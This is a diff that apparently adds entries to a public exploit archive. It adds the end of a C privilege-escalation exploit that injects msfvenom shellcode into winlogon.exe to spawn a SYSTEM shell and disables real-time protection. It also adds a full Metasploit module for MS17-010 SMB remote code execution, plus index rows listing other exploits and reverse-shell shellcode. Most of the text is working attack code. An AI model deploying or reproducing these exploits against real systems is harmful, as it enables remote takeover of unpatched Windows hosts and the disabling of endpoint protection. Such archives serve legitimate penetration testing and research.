+	printf("\t[+] (IOCTL) Opening a full access, user-mode accessible handle from kernel-mode to winlogon\n");
+
+	/*
+	The dispatcher for IOCTL code 0x8000204C opens a full access handle, accessible from usermode, to a process.
+	We use this IOCTL to open a full access handle to winlogon.exe.
+	Note that this IOCTL can only be sent if the process is registered with the driver.
+	*/
+	if (!DeviceIoControl(hDevice, 0x8000204C, &winlogon_pid, sizeof(DWORD), &winlogon_handle, sizeof(HANDLE), &BytesReturned, NULL))
+	{
+		printf("\t[-] DeviceIoControl 0x8000204C failed !\n");
+		return 0;
+	}
+
+	printf("\t[+] Allocating executable memory in winlogon.exe using the full access handle\n");
+
+	if (!(RemoteAllocation = VirtualAllocEx(winlogon_handle, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE)))
+	{
+		printf("\t[-] VirtualAllocEx failed !\n");
+		return 0;
+	}
+
+	printf("\t[+] Writing shellcode to allocated memory\n");
+
+	/*msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread -f c*/
+	unsigned char buf[] =
+		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
+		"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
+		"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
+		"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
+		"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
+		"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
+		"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
+		"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
+		"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
+		"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
+		"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
+		"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
+		"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
+		"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
+		"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
+		"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
+		"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
+		"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
+		"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
+		"\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00";
+
+	if (!WriteProcessMemory(winlogon_handle, RemoteAllocation, buf, sizeof(buf), &BytesReturned))
+	{
+		printf("\t[-] WriteProcessMemory Failed !\n");
+		return 0;
+	}
+
+	printf("\t[+] Spawning SYSTEM shell\n");
+	if (!CreateRemoteThread(winlogon_handle, NULL, 0, RemoteAllocation, NULL, 0, NULL))
+	{
+		printf("\t[-] CreateRemoteThread Failed! Did you compile the exploit as a 64-bit executable ?\n");
+		return 0;
+	}
+
+	printf("[*] Bonus:\n\t[+] Disabling real-time protection\n");
+	if (!DeviceIoControl(hDevice, 0x80002090, NULL, 0, NULL, 0, &BytesReturned, NULL))
+	{
+		printf("\t[-] DeviceIoControl 0x80002090 failed !\n");
+		return 0;
+	}
+	printf("\t[+] RT protection disabled.");
+	return 0;
+}

exploits/windows/remote/43970.rb

@@ -0,0 +1,339 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Windows XP systems that are not part of a domain default to treating all
+# network logons as if they were Guest. This prevents SMB relay attacks from
+# gaining administrative access to these systems. This setting can be found
+# under:
+#
+#  Local Security Settings >
+#   Local Policies >
+#    Security Options >
+#     Network Access: Sharing and security model for local accounts
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Exploit::WbemExec
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',
+      'Description'    => %q{
+        This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
+        primitive. This will then be used to overwrite the connection session information with as an
+        Administrator session. From there, the normal psexec payload code execution is done.
+
+        Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
+        Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
+        exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
+        named pipe.
+      },
+      'Author'         =>
+        [
+          'sleepya',          # zzz_exploit idea and offsets
+          'zerosum0x0',
+          'Shadow Brokers',
+          'Equation Group'
+        ],
+      'License'        => MSF_LICENSE,
+      'DefaultOptions' =>
+        {
+          'WfsDelay'     => 10,
+          'EXITFUNC' => 'thread'
+        },
+      'References'     =>
+        [
+          [ 'AKA', 'ETERNALSYNERGY' ],
+          [ 'AKA', 'ETERNALROMANCE' ],
+          [ 'AKA', 'ETERNALCHAMPION' ],
+          [ 'AKA', 'ETERNALBLUE'],  # does not use any CVE from Blue, but Search should show this, it is preferred
+          [ 'MSB', 'MS17-010' ],
+          [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests
+          [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests
+          [ 'CVE', '2017-0147'], # for EternalRomance reference
+          [ 'URL', 'https://github.com/worawit/MS17-010' ],
+          [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
+          [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
+        ],
+      'Payload'        =>
+        {
+          'Space'        => 3072,
+          'DisableNops'  => true
+        },
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+          [ 'PowerShell', { } ],
+          [ 'Native upload', { } ],
+          [ 'MOF upload', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 14 2017'
+    ))
+
+    register_options(
+      [
+        OptString.new('SHARE',     [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ALLOW_GUEST', [true, "Keep trying if only given guest access", false]),
+        OptString.new('SERVICE_FILENAME', [false, "Filename to to be used on target for the service binary",nil]),
+        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
+        OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil])
+      ])
+  end
+
+  def exploit
+    begin
+      eternal_pwn(datastore['RHOST'])
+      smb_pwn()
+
+    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e
+      print_error("#{e.message}")
+    rescue ::Errno::ECONNRESET,
+           ::Rex::Proto::SMB::Exceptions::LoginError,
+           ::Rex::HostUnreachable,
+           ::Rex::ConnectionTimeout,
+           ::Rex::ConnectionRefused  => e
+      print_error("#{e.class}: #{e.message}")
+    rescue => error
+      print_error(error.class.to_s)
+      print_error(error.message)
+      print_error(error.backtrace.join("\n"))
+    ensure
+      eternal_cleanup()       # restore session
+    end
+  end
+
+  def smb_pwn()
+    case target.name
+    when 'Automatic'
+      if powershell_installed?
+        print_status('Selecting PowerShell target')
+        powershell
+      else
+        print_status('Selecting native target')
+        native_upload
+      end
+    when 'PowerShell'
+      powershell
+    when 'Native upload'
+      native_upload
+    when 'MOF upload'
+      mof_upload
+    end
+
+    handler
+  end
+
+
+  # TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to
+  #       be moved into a mixin
+
+  def powershell_installed?
+    share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
+
+    case datastore['SHARE'].upcase
+    when 'ADMIN$'
+      path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
+    when 'C$'
+      path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
+    else
+      path = datastore['PSH_PATH']
+    end
+
+    simple.connect(share)
+
+    vprint_status("Checking for #{path}")
+
+    if smb_file_exist?(path)
+      vprint_status('PowerShell found')
+      psh = true
+    else
+      vprint_status('PowerShell not found')
+      psh = false
+    end
+
+    simple.disconnect(share)
+
+    psh
+  end
+
+  def powershell
+    ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+
+    if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+    end
+
+    # Execute the powershell command
+    print_status("Executing the payload...")
+    begin
+      psexec(command)
+    rescue StandardError => exec_command_error
+      fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+    end
+  end
+
+  def native_upload
+    filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+    servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
+    serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
+
+    # Upload the shellcode to a file
+    print_status("Uploading payload...")
+    smbshare = datastore['SHARE']
+    fileprefix = ""
+    # if SHARE = Users/sasha/ or something like this
+    if smbshare =~ /.[\\\/]/
+      subfolder = true
+      smbshare = datastore['SHARE'].dup
+      smbshare = smbshare.gsub(/^[\\\/]/,"")
+      folder_list = smbshare.split(/[\\\/]/)
+      smbshare = folder_list[0]
+      fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{fileprefix}\\#{filename}", 'rwct')
+    else
+      subfolder = false
+      simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+      fd = smb_open("\\#{filename}", 'rwct')
+    end
+    exe = ''
+    opts = { :servicename => servicename, :serviceencoder => serviceencoder}
+    begin
+      exe = generate_payload_exe_service(opts)
+
+      fd << exe
+    ensure
+      fd.close
+    end
+
+    if subfolder
+      print_status("Created \\#{fileprefix}\\#{filename}...")
+    else
+      print_status("Created \\#{filename}...")
+    end
+
+    # Disconnect from the share
+    simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+
+    # define the file location
+    if datastore['SHARE'] == 'ADMIN$'
+      file_location = "%SYSTEMROOT%\\#{filename}"
+    elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
+      file_location = datastore['SHARE'].slice(0,1) +  ":\\#{filename}"
+    else
+      file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#{filename}"
+    end
+
+    psexec(file_location, false)
+
+    unless datastore['SERVICE_PERSIST']
+      print_status("Deleting \\#{filename}...")
+      #This is not really useful but will prevent double \\ on the wire :)
+      if datastore['SHARE'] =~ /.[\\\/]/
+        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+        begin
+          simple.delete("\\#{fileprefix}\\#{filename}")
+        rescue XCEPT::ErrorCode => e
+          print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
+        end
+      else
+        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+        begin
+          simple.delete("\\#{filename}")
+        rescue XCEPT::ErrorCode => e
+          print_error("Delete of \\#{filename} failed: #{e.message}")
+        end
+      end
+    end
+  end
+
+  def mof_upload
+    share = "\\\\#{datastore['RHOST']}\\ADMIN$"
+    filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
+
+    # payload as exe
+    print_status("Trying wbemexec...")
+    print_status("Uploading Payload...")
+    if datastore['SHARE'] != 'ADMIN$'
+      print_error('Wbem will only work with ADMIN$ share')
+      return
+    end
+    simple.connect(share)
+    exe = generate_payload_exe
+    fd = smb_open("\\system32\\#{filename}", 'rwct')
+    fd << exe
+    fd.close
+    print_status("Created %SystemRoot%\\system32\\#{filename}")
+
+    # mof to cause execution of above
+    mofname = rand_text_alphanumeric(14) + ".MOF"
+    mof = generate_mof(mofname, filename)
+    print_status("Uploading MOF...")
+    fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
+    fd << mof
+    fd.close
+    print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
+
+    # Disconnect from the ADMIN$
+    simple.disconnect(share)
+  end
+
+  def report_auth
+    service_data = {
+        address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
+        port: datastore['RPORT'],
+        service_name: 'smb',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+        origin_type: :service,
+        module_fullname: self.fullname,
+        private_data: datastore['SMBPass'],
+        username: datastore['SMBUser'].downcase
+    }
+
+    if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
+      credential_data.merge!({
+        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
+        realm_value: datastore['SMBDomain']
+       })
+    end
+
+    if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
+      credential_data.merge!({:private_type => :ntlm_hash})
+    else
+      credential_data.merge!({:private_type => :password})
+    end
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+        access_level: 'Admin',
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+end

files_exploits.csv

@@ -5485,6 +5485,9 @@ id,file,description,date,author,type,platform,port
 43930,exploits/windows/dos/43930.py,"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow",2018-01-30,"Miguel Mendez Z",dos,windows,
 43937,exploits/multiple/dos/43937.html,"WebKit - 'detachWrapper' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple,
 43938,exploits/multiple/dos/43938.html,"WebKit - 'WebCore::FrameView::clientToLayoutViewportPoint' Use-After-Free",2018-02-01,"Google Security Research",dos,multiple,
+43968,exploits/php/dos/43968.py,"WordPress Core -  'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php,
+42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,
+43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@@ -9308,6 +9311,9 @@ id,file,description,date,author,type,platform,port
 43929,exploits/windows/local/43929.c,"System Shield 5.0.0.136 - Privilege Escalation",2018-01-30,"Parvez Anwar",local,windows,
 43935,exploits/linux/local/43935.txt,"systemd (systemd-tmpfiles) < 236 - 'fs.protected_hardlinks=0' Local Privilege Escalation",2018-01-29,"Michael Orlitzky",local,linux,
 43962,exploits/windows/local/43962.c,"Microsoft Windows Subsystem for Linux - 'execve()' Local Privilege Escalation",2018-02-02,"Saar Amar",local,windows,
+43971,exploits/linux/local/43971.rb,"Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)",2018-02-05,Metasploit,local,linux,
+43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
+43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -15982,6 +15988,7 @@ id,file,description,date,author,type,platform,port
 43927,exploits/windows/remote/43927.txt,"HPE iMC 7.3 - RMI Java Deserialization",2018-01-30,"Chris Lyne",remote,windows,
 43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows,
 43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple,
+43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -37970,6 +37977,18 @@ id,file,description,date,author,type,platform,port
 43959,exploits/php/webapps/43959.txt,"Joomla! Component JMS Music 1.1.1 - SQL Injection",2018-02-02,"Ihsan Sencan",webapps,php,
 43960,exploits/multiple/webapps/43960.py,"Oracle Hospitality Simphony (MICROS) 2.7 < 2.9 - Directory Traversal",2018-02-02,"Dmitry Chastuhin",webapps,multiple,
 43961,exploits/hardware/webapps/43961.txt,"FiberHome AN5506 - Unauthenticated Remote DNS Change",2018-02-02,r0ots3c,webapps,hardware,
+43963,exploits/php/webapps/43963.txt,"Wonder CMS 2.3.1 - Unrestricted File Upload",2018-02-05,"Samrat Das",webapps,php,
+43964,exploits/php/webapps/43964.txt,"Wonder CMS 2.3.1 - 'Host' Header Injection",2018-02-05,"Samrat Das",webapps,php,
+43965,exploits/php/webapps/43965.txt,"Matrimonial Website Script 2.1.6 - 'uid' SQL Injection",2018-02-05,L0RD,webapps,php,
+43966,exploits/php/webapps/43966.txt,"NixCMS 1.0 - 'category_id' SQL Injection",2018-02-05,"Bora Bozdogan",webapps,php,
+43967,exploits/php/webapps/43967.py,"Online Voting System - Authentication Bypass",2018-02-05,"Giulio Comi",webapps,php,
+43974,exploits/php/webapps/43974.txt,"Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43975,exploits/php/webapps/43975.html,"Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43976,exploits/php/webapps/43976.txt,"Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43977,exploits/php/webapps/43977.php,"Joomla! Component jLike 1.0 - Information Leak",2018-02-05,"Ihsan Sencan",webapps,php,
+43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
+43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
+43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80

files_shellcodes.csv

@@ -837,7 +837,7 @@ id,file,description,date,author,type,platform
 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86
 43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
-43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2018-11-09,0x4ndr3,shellcode,linux_x86-64
+43951,shellcodes/linux_x86-64/43951.nasm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)",2017-11-09,0x4ndr3,shellcode,linux_x86-64
 43952,shellcodes/linux_x86-64/43952.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)",2017-11-11,0x4ndr3,shellcode,linux_x86-64
 43953,shellcodes/linux_x86-64/43953.nasm,"Linux/x64 - Egghunter (0xbeefbeef) Shellcode (34 bytes)",2017-11-23,0x4ndr3,shellcode,linux_x86-64
 43954,shellcodes/linux_x86-64/43954.nasm,"Linux/x64 - Custom Encoded XOR + execve(/bin/sh) Shellcode",2017-12-16,0x4ndr3,shellcode,linux_x86-64